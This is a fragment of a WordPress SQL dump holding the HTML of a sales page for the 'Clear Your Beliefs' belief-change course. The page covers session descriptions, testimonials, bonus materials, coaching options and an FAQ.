get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2.jpg"><img class="alignleft  wp-image-1029" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-portrait-2-250x300.jpg" alt="Carista portrait 2" width="160" height="192" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn from the creator of one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session helps you learn specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or you can download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li>A complete set of PDF Transcripts of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they have had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 00:59:23', '2014-06-19 05:59:23', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
